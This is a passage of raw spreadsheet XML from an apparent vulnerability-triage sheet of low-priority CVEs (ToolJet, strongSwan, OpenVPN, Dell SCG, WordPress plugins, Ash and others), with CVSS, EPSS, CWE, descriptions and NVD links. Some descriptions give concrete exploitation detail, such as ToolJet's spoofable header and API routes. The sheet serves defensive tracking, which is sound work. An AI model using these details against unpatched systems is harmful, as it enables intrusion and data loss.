        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L4461" s="5" t="inlineStr">
        <is>
          <t>Allocation of resources without limits or throttling in Active Directory Federation Services (AD FS) allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M4461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72978</t>
        </is>
      </c>
    </row>
    <row r="4462">
      <c r="A4462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73068</t>
        </is>
      </c>
      <c r="C4462" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4462" s="5" t="inlineStr"/>
      <c r="F4462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4462" s="5" t="inlineStr"/>
      <c r="H4462" s="5" t="inlineStr"/>
      <c r="I4462" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J4462" s="5" t="inlineStr"/>
      <c r="K4462" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L4462" s="5" t="inlineStr">
        <is>
          <t>ToolJet is the open-source foundation am AI-native platform for building and deploying internal tools, workflows and AI agents. Prior to 3.20.207, the ToolJet Database HTTP API in server/src/modules/tooljet-db/controller.ts authorizes operations against the :organizationId URL path value without verifying that the caller belongs to that organization. JwtAuthGuard validates the tj-workspace-id header against the caller's memberships, while server/src/modules/tooljet-db/ability/index.ts grants VIEW_TABLES, VIEW_TABLE, and JOIN_TABLES without binding them to the path organization. An authenticated user can set tj-workspace-id to the user's own workspace and target another workspace through GET /api/tooljet-db/organizations/:organizationId/tables, GET /api/tooljet-db/organizations/:organizationId/table/:tableName, POST /api/tooljet-db/organizations/:organizationId/join, and the related table-management routes, allowing disclosure of table names, schemas, and rows and allowing tables to be created, altered, bulk populated, or dropped across tenant boundaries. This issue is fixed in version 3.20.207-lts.</t>
        </is>
      </c>
      <c r="M4462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73068</t>
        </is>
      </c>
    </row>
    <row r="4463">
      <c r="A4463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75809</t>
        </is>
      </c>
      <c r="C4463" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4463" s="5" t="inlineStr"/>
      <c r="F4463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4463" s="5" t="inlineStr"/>
      <c r="H4463" s="5" t="inlineStr"/>
      <c r="I4463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4463" s="5" t="inlineStr"/>
      <c r="K4463" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="L4463" s="5" t="inlineStr">
        <is>
          <t>Exposed IOCTL with insufficient access control in ASUS Armoury Crate allows a local user to disclosure information and disabling device functionality by bypassing driver authentication and using IOCTLs to read from and write to PCIe configuration space.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t>
        </is>
      </c>
      <c r="M4463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75809</t>
        </is>
      </c>
    </row>
    <row r="4464">
      <c r="A4464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78123</t>
        </is>
      </c>
      <c r="C4464" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4464" s="5" t="inlineStr"/>
      <c r="F4464" s="5" t="inlineStr"/>
      <c r="G4464" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H4464" s="5" t="inlineStr"/>
      <c r="I4464" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4464" s="5" t="inlineStr"/>
      <c r="K4464" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="L4464" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 has an Expired Pointer Dereference in PKCS#7 parsing in the openssl plugin.</t>
        </is>
      </c>
      <c r="M4464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78123</t>
        </is>
      </c>
    </row>
    <row r="4465">
      <c r="A4465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78126</t>
        </is>
      </c>
      <c r="C4465" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4465" s="5" t="inlineStr"/>
      <c r="F4465" s="5" t="inlineStr"/>
      <c r="G4465" s="5" t="inlineStr"/>
      <c r="H4465" s="5" t="inlineStr"/>
      <c r="I4465" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4465" s="5" t="inlineStr"/>
      <c r="K4465" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L4465" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.1.10 through 6.0.7 allows a NULL pointer dereference in the eap-aka plugin.</t>
        </is>
      </c>
      <c r="M4465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78126</t>
        </is>
      </c>
    </row>
    <row r="4466">
      <c r="A4466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78129</t>
        </is>
      </c>
      <c r="C4466" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4466" s="5" t="inlineStr"/>
      <c r="F4466" s="5" t="inlineStr"/>
      <c r="G4466" s="5" t="inlineStr"/>
      <c r="H4466" s="5" t="inlineStr"/>
      <c r="I4466" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4466" s="5" t="inlineStr"/>
      <c r="K4466" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L4466" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.6.2 through 6.0.7 has an infinite loop in PKCS#5 decryption.</t>
        </is>
      </c>
      <c r="M4466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78129</t>
        </is>
      </c>
    </row>
    <row r="4467">
      <c r="A4467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78221</t>
        </is>
      </c>
      <c r="C4467" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4467" s="5" t="inlineStr"/>
      <c r="F4467" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4467" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H4467" s="5" t="inlineStr"/>
      <c r="I4467" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4467" s="5" t="inlineStr"/>
      <c r="K4467" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L4467" s="5" t="inlineStr">
        <is>
          <t>An incorrect buffer size calculation in the Windows Interactive Service in OpenVPN 2.7_alpha1 through 2.7.6 allows local authenticated users to cause memory corruption or disclose sensitive information via crafted NRPT inputs.</t>
        </is>
      </c>
      <c r="M4467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78221</t>
        </is>
      </c>
    </row>
    <row r="4468">
      <c r="A4468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78483</t>
        </is>
      </c>
      <c r="C4468" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4468" s="5" t="inlineStr"/>
      <c r="F4468" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4468" s="5" t="inlineStr"/>
      <c r="H4468" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4468" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4468" s="5" t="inlineStr"/>
      <c r="K4468" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4468"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M4468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78483</t>
        </is>
      </c>
    </row>
    <row r="4469">
      <c r="A4469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78489</t>
        </is>
      </c>
      <c r="C4469" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4469" s="5" t="inlineStr"/>
      <c r="F4469" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4469" s="5" t="inlineStr"/>
      <c r="H4469" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4469" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4469" s="5" t="inlineStr"/>
      <c r="K4469" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4469"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M4469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78489</t>
        </is>
      </c>
    </row>
    <row r="4470">
      <c r="A4470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78620</t>
        </is>
      </c>
      <c r="C4470" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4470" s="5" t="inlineStr"/>
      <c r="F4470" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4470" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H4470" s="5" t="inlineStr"/>
      <c r="I4470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J4470" s="5" t="inlineStr"/>
      <c r="K4470" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L4470" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway Kerberos configuration handler does not validate file paths specified in event payloads before writing file contents. The path from the event payload is used directly as the write destination, resulting in files being written to unintended locations on the appliance filesystem.</t>
        </is>
      </c>
      <c r="M4470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78620</t>
        </is>
      </c>
    </row>
    <row r="4471">
      <c r="A4471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79962</t>
        </is>
      </c>
      <c r="C4471" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4471" s="5" t="inlineStr"/>
      <c r="F4471" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4471" s="5" t="inlineStr"/>
      <c r="H4471" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4471" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4471" s="5" t="inlineStr"/>
      <c r="K4471" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="L4471" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M4471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79962</t>
        </is>
      </c>
    </row>
    <row r="4472">
      <c r="A4472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79968</t>
        </is>
      </c>
      <c r="C4472" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4472" s="5" t="inlineStr"/>
      <c r="F4472" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4472" s="5" t="inlineStr"/>
      <c r="H4472" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4472" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4472" s="5" t="inlineStr"/>
      <c r="K4472" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L4472" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M4472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79968</t>
        </is>
      </c>
    </row>
    <row r="4473">
      <c r="A4473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79969</t>
        </is>
      </c>
      <c r="C4473" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4473" s="5" t="inlineStr"/>
      <c r="F4473" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4473" s="5" t="inlineStr"/>
      <c r="H4473" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I4473" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4473" s="5" t="inlineStr"/>
      <c r="K4473" s="5" t="inlineStr">
        <is>
          <t>CWE-567</t>
        </is>
      </c>
      <c r="L4473" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to denial of service.</t>
        </is>
      </c>
      <c r="M4473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79969</t>
        </is>
      </c>
    </row>
    <row r="4474">
      <c r="A4474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80051</t>
        </is>
      </c>
      <c r="C4474" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4474" s="5" t="inlineStr"/>
      <c r="F4474" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4474" s="5" t="inlineStr"/>
      <c r="H4474" s="5" t="inlineStr"/>
      <c r="I4474" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J4474" s="5" t="inlineStr"/>
      <c r="K4474" s="5" t="inlineStr">
        <is>
          <t>CWE-1287</t>
        </is>
      </c>
      <c r="L4474" s="5" t="inlineStr">
        <is>
          <t>github.com/graphql-go/graphql (GraphQL for Go) through 0.8.1 does not validate that a scalar variable value matches its declared type. The built-in coerceString and coerceBool functions (scalars.go) accept input whose type does not match the declared String, ID, or Boolean scalar instead of raising the request error that the GraphQL specification mandates. In some cases (but not any typical case of JSON sent to a website), a deeply nested value leads to an unrecoverable "fatal error: stack overflow" condition.</t>
        </is>
      </c>
      <c r="M4474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80051</t>
        </is>
      </c>
    </row>
    <row r="4475">
      <c r="A4475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80125</t>
        </is>
      </c>
      <c r="C4475" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4475" s="5" t="inlineStr"/>
      <c r="F4475" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4475" s="5" t="inlineStr"/>
      <c r="H4475" s="5" t="inlineStr"/>
      <c r="I4475" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J4475" s="5" t="inlineStr"/>
      <c r="K4475" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L4475"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4475" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80125</t>
        </is>
      </c>
    </row>
    <row r="4476">
      <c r="A4476" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4476" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80341</t>
        </is>
      </c>
      <c r="C4476" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4476" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4476" s="5" t="inlineStr"/>
      <c r="F4476" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4476" s="5" t="inlineStr"/>
      <c r="H4476" s="5" t="inlineStr"/>
      <c r="I4476" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4476" s="5" t="inlineStr"/>
      <c r="K4476" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L4476" s="5" t="inlineStr">
        <is>
          <t>The Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not verify that a stored payment method belongs to the user attaching it, allowing any authenticated user, such as a subscriber, to bind another customer's stored card to their own account and then charge or delete it.
Exploitation requires the attacker to already know the payment provider's identifier for the victim's stored method, which the Payment Plugins for PayPal WooCommerce WordPress plugin before 2.0.26 does not expose.</t>
        </is>
      </c>
      <c r="M4476" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80341</t>
        </is>
      </c>
    </row>
    <row r="4477">
      <c r="A4477" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4477" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80438</t>
        </is>
      </c>
      <c r="C4477" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4477" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4477" s="5" t="inlineStr"/>
      <c r="F4477" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4477" s="5" t="inlineStr"/>
      <c r="H4477" s="5" t="inlineStr"/>
      <c r="I4477" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4477" s="5" t="inlineStr"/>
      <c r="K4477" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L4477" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms  WordPress plugin before 3.15.2 does not restrict its REST abilities to administrators, accepting a Ninja Forms  WordPress plugin before 3.15.2-specific capability as equivalent to full site administration, which allows any user granted that capability to read Ninja Forms  WordPress plugin before 3.15.2 settings and stored form submissions, overwrite the Ninja Forms  WordPress plugin before 3.15.2's configuration, and create or modify arbitrary posts and pages.
The capability belongs to no default WordPress role and the Ninja Forms  WordPress plugin before 3.15.2 never grants it, so an administrator must have assigned it, typically when delegating access to the form builder.</t>
        </is>
      </c>
      <c r="M4477" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80438</t>
        </is>
      </c>
    </row>
    <row r="4478">
      <c r="A4478" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4478" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81347</t>
        </is>
      </c>
      <c r="C4478" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4478" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4478" s="5" t="inlineStr"/>
      <c r="F4478" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G4478" s="5" t="inlineStr"/>
      <c r="H4478" s="5" t="inlineStr"/>
      <c r="I4478" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J4478" s="5" t="inlineStr"/>
      <c r="K4478" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L4478" s="5" t="inlineStr">
        <is>
          <t>The Frontend Admin by DynamiApps WordPress plugin before 3.29.13 does not properly validate a user-controllable directory path before deleting files within it, allowing unauthenticated attackers to delete index.php and .htaccess files outside the intended directory, including the WordPress root, which can render the site inoperable. Successful exploitation requires a non-default form configuration.</t>
        </is>
      </c>
      <c r="M4478" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81347</t>
        </is>
      </c>
    </row>
    <row r="4479">
      <c r="A4479" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4479" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81646</t>
        </is>
      </c>
      <c r="C4479" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4479" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4479" s="5" t="inlineStr"/>
      <c r="F4479" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4479" s="5" t="inlineStr"/>
      <c r="H4479" s="5" t="inlineStr"/>
      <c r="I4479" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J4479" s="5" t="inlineStr"/>
      <c r="K4479" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L4479" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read vulnerability in the graphics module.
Impact: Successful exploitation of this vulnerability may affect availability.</t>
        </is>
      </c>
      <c r="M4479" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81646</t>
        </is>
      </c>
    </row>
    <row r="4480">
      <c r="A4480" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4480" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82215</t>
        </is>
      </c>
      <c r="C4480" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4480" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4480" s="5" t="inlineStr"/>
      <c r="F4480" s="5" t="inlineStr"/>
      <c r="G4480" s="5" t="inlineStr"/>
      <c r="H4480" s="5" t="inlineStr"/>
      <c r="I4480" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J4480" s="5" t="inlineStr"/>
      <c r="K4480" s="5" t="inlineStr"/>
      <c r="L4480" s="5" t="inlineStr">
        <is>
          <t>The Payment Gateway PayPay for WooCommerce WordPress plugin from 0.5 to 0.9.3 does not verify the authenticity of the payment notifications it receives before acting on them, allowing unauthenticated attackers who know the store's merchant identifier to mark arbitrary orders as paid, or to cancel or fail them.</t>
        </is>
      </c>
      <c r="M4480" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82215</t>
        </is>
      </c>
    </row>
    <row r="4481">
      <c r="A4481" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4481" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82752</t>
        </is>
      </c>
      <c r="C4481" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4481" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4481" s="5" t="inlineStr"/>
      <c r="F4481" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4481" s="5" t="inlineStr"/>
      <c r="H4481" s="5" t="inlineStr"/>
      <c r="I4481" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J4481" s="5" t="inlineStr"/>
      <c r="K4481" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L4481" s="5" t="inlineStr">
        <is>
          <t>Improper Validation of Specified Quantity in Input vulnerability in ash-project ash allows an attacker to store a value of arbitrary size in an attribute whose length constraint should bound it.
Ash measures string length with Elixir's String.length/1, which counts Unicode graphemes, in the max_length and min_length constraints of Ash.Type.String (apply_constraints/2 in lib/ash/type/string.ex), in Ash.Resource.Validation.StringLength, and in the string_length expression function. A grapheme carries an unbounded number of combining marks, so a base character followed by a million combining acute accents is one grapheme and megabytes of data, and satisfies max_length: 2. Where the data layer imposes no independent limit (ETS, Mnesia, or a Postgres text column) the whole value is persisted, so an attacker can write an entire request body into an attribute declared with a small maximum and grow storage without bound.
The counting unit also disagrees with the storage layer, which counts codepoints rather than graphemes, so a value accepted by the constraint can still be rejected or truncated by the column. A Postgres varchar(n) column bounds the value itself and is not exposed.
This issue affects ash: from 0.10.0 before 3.33.0.</t>
        </is>
      </c>
      <c r="M4481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82752</t>
        </is>
      </c>
    </row>
    <row r="4482">
      <c r="A4482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84185</t>
        </is>
      </c>
      <c r="C4482" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4482" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4482" s="5" t="inlineStr"/>
      <c r="F4482" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G4482" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4482" s="5" t="inlineStr"/>
      <c r="I4482" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J4482" s="5" t="inlineStr"/>
      <c r="K4482" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L4482" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the jwcrypto library, which is used for implementing Javascript Object Signing and Encryption (JOSE) standards. The issue occurs when the library verifies a General JSON Serialization JWS using a set of keys. Due to a coding error, the library fails to correctly identify the specific key ID (kid) and may instead accept a signature made by any valid key in the set. This can allow an attacker with a valid key to bypass authorization checks in applications that rely on the key ID to identify specific tenants or users.</t>
        </is>
      </c>
      <c r="M4482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84185</t>
        </is>
      </c>
    </row>
    <row r="4483">
      <c r="A4483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B4483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84363</t>
        </is>
      </c>
      <c r="C4483" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="D4483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E4483" s="5" t="inlineStr"/>
      <c r="F4483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G4483" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H4483" s="5" t="inlineStr"/>
